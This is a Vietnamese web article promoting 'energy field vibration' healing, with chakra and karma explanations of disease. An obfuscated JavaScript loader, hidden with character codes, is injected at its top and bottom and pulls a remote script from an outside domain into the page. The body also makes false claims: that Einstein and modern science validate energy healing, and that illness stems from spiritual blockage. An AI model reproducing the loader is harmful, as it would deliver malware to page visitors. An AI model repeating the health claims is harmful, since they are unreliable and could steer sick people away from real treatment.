Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
bài thuốc rung động trường năng lượng

Rung động trường năng lượng

Rung động trường năng lượng đã được khoa học hiện đại xác nhận và thấu hiểu bởi thuyết Einstein như là một khía cạnh của năng lượng, đặc biệt được áp dụng vào những bài kiểm tra trên hệ thống sinh vật dựa trên quan điểm của sự tương tác trường năng lượng. Xin mời quy độc giả hãy cùng Jade House Việt Nam (www.jadehousevn.com) khám phá chủ đề bài viết về rung đông trường năng lượng nhé.

Trường năng lượng

Sự nhìn nhận của thuyết Einstein về con người dựa trên quan điểm của những trường không gian cao hơn. Về bản chất, từ những hạt nhỏ nhất bên trong nguyên tử đến cơ thể vật lý và những cơ thể với tần số rung động cao hơn đã được nhìn nhận như sự tập trung của dao động trường năng lượng.

Chúng ta đã bắt đầu nghĩ về con người như là sự tồn tại của nguồn ánh sáng tâm linh đa chiều, chúng ta có thể bắt đầu thấu hiểu được hiệu quả của phương pháp chữa bệnh bằng sự rung động trường năng lượng thông qua việc tác động lên cơ thể trường năng lượng để củng cố và khôi phục lại hệ thống Cơ thể-Tâm trí-Tâm thức.

Phương pháp chữa bệnh bằng sự rung động trường năng lượng dựa trên việc cân bằng hệ thống tác động lẫn nhau của các dòng năng lượng chảy trong trường năng lượng. Các dòng năng lượng của thế giới năng lượng và các thế giới ở tần số cao hơn của cơ thể năng lượng con người dao động với tần số nhanh hơn ánh sáng thông thường.

Hệ thống trường năng lượng

Thế giới loài người chính là hệ thống trường năng lượng phản ánh mô hình tiến hóa của Linh hồn. Sự tỉnh thức của con người thể hiện việc luôn học hỏi, phát triển và tiến hóa. Sự hiểu biết mang tính tâm linh về quá trình thay đổi tuyệt vời này càng nhiều, sẽ tạo ra kết quả to lớn trong việc gia tăng toàn bộ hệ thống trường năng lượng con người.

Cách sống và cách suy nghĩ của mỗi chúng ta

Phần lớn mọi người đến với các phương pháp vật lý để chữa trị những căn bệnh, nhưng lại không nghĩ đến việc thay đổi cách sống và cách suy nghĩ. Sự tác động vật lý đối với bệnh nhân chỉ giúp chữa trị cho bề nổi là kết quả lâu dài của hai điều này.

Bệnh tật là phản ánh của…

Bệnh tật của chúng ta chính là sự phản ánh của những nguyên nhân bên trong như sự kiềm chế cảm xúc, tắc nghẽn tâm linh, và mầm mống có sẵn. Mặc dù các tác nhân bên ngoài cũng có thể tạo ra những tác động tiêu cực, nhưng những ảnh hưởng đó chỉ có thể tạo ra bệnh tật tại những nơi quá nhạy cảm.

Đối với cơ thể năng lượng của chúng ta, luân xa và hệ thống cao cấp, các cảm xúc tiêu cực và tắc nghẽn tâm linh tạo nên sự suy yếu của hệ thống sinh hóa biểu hiện bằng bệnh tật ra bên ngoài cơ thể vật lý.

Tắc nghẽn xảy ra khi nào?

Khi bệnh tật xuất hiện, đó là biểu hiện cho thấy chúng ta đang làm tắc nghẽn các dòng suy nghĩ tỉnh thức và năng lượng tự nhiên qua sự mất cân bằng của hệ Cơ thể-Tâm trí-Tâm linh. Đó là những dấu hiệu cảnh báo một bộ phận nào đó trong cơ thể đang yếu đi.

Khu vực bị tắc nghẽn cần được cân bằng để khôi phục lại sức khỏe toàn diện. Khi bạn có sự tắc nghẽn tạo ra bởi các nguyên nhân trong cuộc sống như trên, các tắc nghẽn sẽ chặn các dòng năng lượng tại luân xa, do đó, các dòng năng lượng cuộc sống cũng sẽ bị ngăn chặn gây ra ảnh hưởng xấu đến các cơ quan tương ứng. Các tắc nghẽn lâu dài sẽ thể hiện thông qua những bệnh mãn tính và đó chính là bài học quan trọng về nghiệp quả cho mỗi con người.

Bài thuốc rung động trường năng lượng

Phương pháp rung động giúp gia tăng sức kết nối năng lượng giữa con người và bản thể (linh hồn), bằng cách làm cân bằng hoàn toàn Cơ thể-Tâm trí-Tâm linh. Không phải tất cả các phương pháp chữa trị bằng rung động đều có hiệu quả ở mức năng lượng cao hơn, nhưng đó chính là mong muốn và mục tiêu cho các nhà khoa học để nghiên cứu về phương pháp rung động và giúp đỡ cho bệnh nhân lấy lại cân bằng.

(Dunji, Sưu tầm và biên soạn)

 

 

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();